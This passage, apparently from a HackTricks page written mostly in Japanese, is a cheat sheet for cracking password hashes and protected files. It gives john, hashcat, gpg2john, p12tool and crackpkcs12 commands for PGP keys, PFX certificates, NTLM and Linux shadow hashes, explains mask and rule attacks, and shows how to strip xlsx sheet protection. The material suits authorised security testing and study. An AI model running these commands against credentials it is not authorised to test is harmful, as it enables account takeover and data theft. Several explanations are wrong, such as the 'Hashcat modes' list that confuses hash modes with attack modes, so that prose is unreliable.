<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
PGP/GPGの秘密鍵
Brute forcing a PGP/GPG private key is an extremely difficult task due to the large key space. The private key is typically protected by a passphrase, which adds an additional layer of security. However, if the passphrase is weak or easily guessable, it may be possible to brute force the key.
To brute force a PGP/GPG private key, you would need to generate all possible key combinations and test each one until the correct passphrase is found. This process can be time-consuming and resource-intensive, especially for longer and more complex passphrases.
There are several tools available that can assist in brute forcing PGP/GPG private keys, such as pgcrack
and gpg2john
. These tools automate the process of generating key combinations and testing them against the private key.
It is important to note that brute forcing a PGP/GPG private key is generally considered unethical and illegal without proper authorization. It is recommended to only use these techniques for legitimate purposes, such as recovering a forgotten passphrase or testing the strength of your own private key.
gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
Cisco
DPAPI Master Key
https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.pyを使用して、次にjohnを使用します。
Open Office Pwd Protected Column
パスワードで保護された列を持つxlsxファイルがある場合、次の手順で保護を解除できます:
- Googleドライブにアップロードし、パスワードは自動的に削除されます
- 手動で削除するには:
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .
PFX証明書
PFX証明書は、公開鍵暗号方式で使用されるデジタル証明書の一種です。PFXは、個人情報交換ファイル(Personal Information Exchange)の略称です。PFX証明書は、秘密鍵と公開鍵のペアを含み、一般的にはパスワードで保護されています。
PFX証明書は、デジタル署名や暗号化などのセキュリティ関連の操作に使用されます。PFX証明書を使用すると、データの機密性や整合性を確保することができます。
PFX証明書の作成や管理には、さまざまなツールやリソースが利用されます。一般的な手法としては、PFX証明書を作成するためのツールを使用し、必要な情報を入力して証明書を生成します。また、PFX証明書の管理には、証明書ストアやキーチェーンなどのリソースが使用されます。
PFX証明書は、セキュリティ上の重要な要素であり、適切な管理が必要です。証明書の期限切れや漏洩などの問題を防ぐために、定期的な更新や監視が必要です。
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築し、自動化することができます。
今すぐアクセスを取得してください:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
ツール
ハッシュの例: https://openwall.info/wiki/john/sample-hashes
ハッシュ識別子
hash-identifier
> <HASH>
ワードリスト
ワードリスト生成ツール
- kwprocessor: 設定可能なベース文字、キーマップ、ルートを持つ高度なキーボードウォークジェネレーター。
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
Johnの変異
_/etc/john/john.conf_を読み、それを設定します。
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
Hashcat
Hashcatの攻撃方法
- ワードリスト攻撃 (
-a 0
) とルール
Hashcatにはすでにルールが含まれたフォルダがありますが、ここで他の興味深いルールを見つけることができます。
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
- ワードリスト組み合わせ攻撃
hashcatを使用して、2つのワードリストを1つに組み合わせることができます。
もし、リスト1に単語**"hello"が含まれており、2つ目のリストには単語"world"と"earth"**が2行含まれている場合、helloworld
とhelloearth
という単語が生成されます。
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
- マスク攻撃 (
-a 3
)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
- ワードリスト + マスク (
-a 6
) / マスク + ワードリスト (-a 7
) 攻撃
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
Hashcatのモード
Hashcatは、さまざまなハッシュアルゴリズムをクラックするためのさまざまなモードを提供しています。以下にいくつかの一般的なモードを示します。
-
ハッシュモード(モード0):ハッシュ値を解読するための基本的なモードです。ハッシュ値を入力として受け取り、対応する平文を見つけることを試みます。
-
ハイブリッドモード(モード6):辞書攻撃とルールベースの攻撃を組み合わせた攻撃方法です。辞書ファイルとルールファイルを使用して、パスワードを推測します。
-
ルールベースの攻撃(モード7):ルールファイルを使用して、既知のパスワードパターンに基づいてパスワードを生成します。これにより、一般的なパスワードの変形やパターンを網羅的に試すことができます。
-
組み合わせ攻撃(モード1):複数の辞書ファイルを組み合わせてパスワードを推測します。辞書ファイルの組み合わせを試すことで、より多くのパスワードのバリエーションを網羅的に試すことができます。
-
ブルートフォース攻撃(モード3):すべての可能な組み合わせを試す攻撃方法です。これは非常に時間がかかる場合がありますが、パスワードが非常に強力な場合に有効です。
これらはHashcatの一部ですが、他にもさまざまなモードがあります。ハッシュの種類や攻撃の目的に応じて、適切なモードを選択することが重要です。
hashcat --example-hashes | grep -B1 -A2 "NTLM"
Linuxハッシュのクラック - /etc/shadowファイル
概要
Linuxシステムでは、ユーザーのパスワードは/etc/shadowファイルにハッシュ化されて保存されます。このファイルは通常、rootユーザーのみがアクセスできるようになっています。しかし、ハッシュ関数の性質上、ハッシュ値から元のパスワードを復元することは不可能ではありません。このため、ハッシュを解読することで、ユーザーのパスワードを取得することができます。
ブルートフォース攻撃
ブルートフォース攻撃は、ハッシュ値を解読するための一般的な手法です。この攻撃では、可能なすべてのパスワードの組み合わせを試し、ハッシュ値と一致するものを見つけることを目指します。
以下は、ブルートフォース攻撃の手順です。
- ハッシュ値を取得します。/etc/shadowファイルからユーザーのハッシュ値を抽出します。
- パスワードリストを作成します。攻撃者は、一般的なパスワードや辞書攻撃に使用するためのパスワードリストを作成します。
- パスワードリストを使用して攻撃を開始します。攻撃者は、パスワードリスト内の各パスワードをハッシュ化し、ハッシュ値と一致するかどうかを確認します。
- 一致するパスワードが見つかるまで繰り返します。攻撃者は、すべてのパスワードを試すまで繰り返します。
ツールとリソース
ブルートフォース攻撃を実行するためには、以下のツールとリソースが必要です。
- パスワードリスト: ブルートフォース攻撃に使用するパスワードのリストです。一般的なパスワードや辞書攻撃に使用されることがあります。
- ハッシュクラッキングツール: ハッシュ値を解読するためのツールです。John the RipperやHashcatなどが一般的に使用されます。
対策方法
ユーザーのパスワードを保護するためには、以下の対策を実施することが重要です。
- 強力なパスワードポリシーの設定: ユーザーには、複雑なパスワードを使用するように要求するポリシーを設定します。
- パスワードのハッシュ化: パスワードはハッシュ関数を使用して保存されるべきです。また、ソルトを使用してハッシュ値をより安全にすることも重要です。
- パスワードリストの使用禁止: システム上で一般的なパスワードリストの使用を禁止します。
- ログイン試行回数の制限: ログイン試行回数を制限することで、ブルートフォース攻撃を防ぐことができます。
以上がLinuxハッシュのクラックに関する情報です。ユーザーのパスワードを保護するためには、適切な対策を実施することが重要です。
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
Windowsハッシュのクラック
概要
Windowsオペレーティングシステムでは、ユーザーのパスワードはハッシュ値として保存されます。このハッシュ値を解読することで、パスワードを特定することができます。このセクションでは、Windowsハッシュのクラックについて説明します。
ツールとリソース
Windowsハッシュをクラックするために使用できるさまざまなツールとリソースがあります。以下はいくつかの一般的なものです。
- John the Ripper: パスワードクラッキングツールで、Windowsハッシュの解読に使用できます。
- Hashcat: 高速なパスワードリカバリツールで、Windowsハッシュのクラックに使用できます。
- RainbowCrack: レインボーテーブルを使用して、Windowsハッシュを解読するための効率的なツールです。
- Online Hash Crack: オンラインサービスで、Windowsハッシュのクラックを行うことができます。
ブルートフォース攻撃
ブルートフォース攻撃は、すべての可能な組み合わせを試すことでパスワードを解読する手法です。Windowsハッシュのクラックにおいても、ブルートフォース攻撃は有効な手法の一つです。
以下は、ブルートフォース攻撃を使用してWindowsハッシュをクラックする手順です。
-
パスワードリストの作成: ブルートフォース攻撃に使用するパスワードのリストを作成します。一般的なパスワードや辞書攻撃に使用される単語を含めることができます。
-
ツールの設定: 使用するツール(例:John the Ripper、Hashcat)を選択し、必要な設定を行います。ハッシュの種類や攻撃方法などを指定します。
-
攻撃の実行: ツールを使用してブルートフォース攻撃を実行します。ツールはパスワードリストの各項目を試し、ハッシュと一致するパスワードを見つけるまで続けます。
-
パスワードの特定: ツールが一致するパスワードを見つけた場合、それがWindowsハッシュのパスワードとなります。これにより、システムにアクセスすることができます。
注意事項
Windowsハッシュのクラックは、合法的な目的のためにのみ使用されるべきです。また、クラックする前に適切な許可を取得することが重要です。不正なアクセスやプライバシーの侵害には厳しく対処されます。
以上がWindowsハッシュのクラックに関する概要です。適切なツールとリソースを使用し、合法的な目的のためにのみクラックを行うようにしてください。
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
Brute Force
Brute force is a common method used to crack application hashes. It involves systematically trying every possible combination of characters until the correct password is found.
Dictionary Attack
A dictionary attack is a type of brute force attack that uses a pre-defined list of commonly used passwords, known as a dictionary, to crack hashes. This method is effective against weak passwords that are easily guessable.
Hybrid Attack
A hybrid attack combines elements of both brute force and dictionary attacks. It involves trying all possible combinations of characters, including variations of dictionary words, to crack hashes. This method is effective against stronger passwords that are not easily guessable.
Rainbow Tables
Rainbow tables are precomputed tables of hashes and their corresponding plaintext passwords. They can be used to quickly crack hashes by looking up the plaintext password in the table. However, rainbow tables can be large and require a significant amount of storage space.
GPU Acceleration
Graphics Processing Units (GPUs) can be used to accelerate the brute force cracking process. GPUs are highly parallel processors that can perform many calculations simultaneously, making them well-suited for password cracking. Tools like hashcat and John the Ripper support GPU acceleration.
Online Hash Cracking Services
There are online services available that offer hash cracking capabilities. These services typically use powerful hardware and large databases of precomputed hashes to quickly crack passwords. However, using these services may raise ethical and legal concerns, so caution should be exercised.
Conclusion
Brute force attacks, dictionary attacks, hybrid attacks, rainbow tables, GPU acceleration, and online hash cracking services are all methods that can be used to crack application hashes. Each method has its own advantages and disadvantages, and the choice of method will depend on factors such as the strength of the password and the available resources.
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
10800 | SHA-384 | Raw Hash
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。
Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。
今すぐアクセスを取得:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}